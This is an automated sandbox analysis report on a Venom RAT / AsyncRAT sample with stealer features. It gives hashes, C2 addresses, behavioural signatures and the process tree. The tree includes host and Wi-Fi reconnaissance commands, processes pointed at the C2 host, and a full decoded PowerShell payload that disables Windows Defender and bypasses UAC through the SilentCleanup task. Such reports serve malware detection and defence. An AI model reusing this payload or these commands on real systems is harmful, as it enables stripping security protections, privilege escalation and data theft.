Resubmissions

13-01-2025 01:08

250113-bhl5gs1kfl 10

12-01-2025 12:45

250112-pzgszsspby 10

10-01-2025 15:08

250110-shv6tszqaq 10

Analysis

  • max time kernel
    822s
  • max time network
    725s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2025 15:08

General

  • Target

    Client.exe

  • Size

    74KB

  • MD5

    5b1f7f243956595af2cef317a273275e

  • SHA1

    f6bcfbc268be9c272559f7345d1684b27d983fe1

  • SHA256

    c29bc00a3915c04961b3a25c499c3c9f43c33c6b484c00df4a5c8b3695344bea

  • SHA512

    1979d0564afeeaec460c86179707ff29da602ab1c66958453c52816f99e863665cdb0f08bb5b540615c8f54b752dc8ba8bb655a15b52eb5a0c5d4d9d33dccfbf

  • SSDEEP

    1536:EUzkcx4VHsC0SPMV7e9VdQuDI6H1bf/0dmIQzc2LVclN:EUwcx4GfSPMV7e9VdQsH1bfEmIQPBY

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

127.0.0.1:4449

127.0.0.1:8000

127.0.0.1:64240

193.161.193.99:4449

193.161.193.99:8000

193.161.193.99:64240

Mutex

oklwlbhdlrw

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 45 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Accesses Microsoft Outlook profiles
    • Checks whether UAC is enabled
    • Drops desktop.ini file(s)
    • Suspicious use of SetThreadContext
    • Drops file in Program Files directory
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • System policy modification
    • outlook_office_path
    • outlook_win_path
    PID:1652
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:748
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
      2⤵
        PID:4840
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
        2⤵
        • System Location Discovery: System Language Discovery
        PID:952
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4644
        • C:\Windows\system32\PING.EXE
          ping google.com
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3184
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/
        2⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:6324
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8a61c46f8,0x7ff8a61c4708,0x7ff8a61c4718
          3⤵
            PID:6340
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
            3⤵
              PID:3240
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:544
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
              3⤵
                PID:4744
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                3⤵
                  PID:392
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                  3⤵
                    PID:3088
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
                    3⤵
                      PID:4976
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
                      3⤵
                        PID:6776
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
                        3⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3584
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
                        3⤵
                          PID:5216
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
                          3⤵
                            PID:5224
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
                            3⤵
                              PID:5892
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,12391122175702575120,7965898164275864382,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
                              3⤵
                                PID:5900
                            • C:\Windows\explorer.exe
                              "C:\Windows\explorer.exe"
                              2⤵
                                PID:216
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
                                2⤵
                                  PID:1960
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4448 HVNC_MUTEX
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:368
                                • C:\Windows\explorer.exe
                                  "C:\Windows\explorer.exe"
                                  2⤵
                                    PID:1072
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX
                                    2⤵
                                      PID:704
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2568
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      "cmd.exe"
                                      2⤵
                                        PID:5704
                                        • C:\Windows\system32\systeminfo.exe
                                          systeminfo
                                          3⤵
                                          • Gathers system information
                                          PID:5748
                                        • C:\Windows\system32\HOSTNAME.EXE
                                          hostname
                                          3⤵
                                            PID:2304
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic logicaldisk get caption,description,providername
                                            3⤵
                                            • Collects information from the system
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5136
                                          • C:\Windows\system32\net.exe
                                            net user
                                            3⤵
                                              PID:5164
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user
                                                4⤵
                                                  PID:5168
                                              • C:\Windows\system32\query.exe
                                                query user
                                                3⤵
                                                  PID:5184
                                                  • C:\Windows\system32\quser.exe
                                                    "C:\Windows\system32\quser.exe"
                                                    4⤵
                                                      PID:5988
                                                  • C:\Windows\system32\net.exe
                                                    net localgroup
                                                    3⤵
                                                      PID:1512
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 localgroup
                                                        4⤵
                                                          PID:5212
                                                      • C:\Windows\system32\net.exe
                                                        net localgroup administrators
                                                        3⤵
                                                          PID:6160
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 localgroup administrators
                                                            4⤵
                                                              PID:6300
                                                          • C:\Windows\system32\net.exe
                                                            net user guest
                                                            3⤵
                                                              PID:6024
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 user guest
                                                                4⤵
                                                                  PID:6044
                                                              • C:\Windows\system32\net.exe
                                                                net user administrator
                                                                3⤵
                                                                  PID:1556
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user administrator
                                                                    4⤵
                                                                      PID:3364
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic startup get caption,command
                                                                    3⤵
                                                                      PID:6828
                                                                    • C:\Windows\system32\tasklist.exe
                                                                      tasklist /svc
                                                                      3⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:996
                                                                    • C:\Windows\system32\ipconfig.exe
                                                                      ipconfig /all
                                                                      3⤵
                                                                      • Gathers network information
                                                                      PID:4160
                                                                    • C:\Windows\system32\ROUTE.EXE
                                                                      route print
                                                                      3⤵
                                                                        PID:4776
                                                                      • C:\Windows\system32\ARP.EXE
                                                                        arp -a
                                                                        3⤵
                                                                        • Network Service Discovery
                                                                        PID:1760
                                                                      • C:\Windows\system32\NETSTAT.EXE
                                                                        netstat -ano
                                                                        3⤵
                                                                        • System Network Connections Discovery
                                                                        • Gathers network information
                                                                        PID:3068
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc query type= service state= all
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:1500
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh firewall show state
                                                                        3⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:1176
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh firewall show config
                                                                        3⤵
                                                                        • Modifies Windows Firewall
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        PID:4340
                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                      2⤵
                                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                                      PID:3236
                                                                      • C:\Windows\system32\chcp.com
                                                                        chcp 65001
                                                                        3⤵
                                                                          PID:5276
                                                                        • C:\Windows\system32\netsh.exe
                                                                          netsh wlan show profile
                                                                          3⤵
                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                          PID:6984
                                                                        • C:\Windows\system32\findstr.exe
                                                                          findstr All
                                                                          3⤵
                                                                            PID:2508
                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                          "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                          2⤵
                                                                            PID:540
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              3⤵
                                                                                PID:4508
                                                                              • C:\Windows\system32\netsh.exe
                                                                                netsh wlan show networks mode=bssid
                                                                                3⤵
                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                PID:5492
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
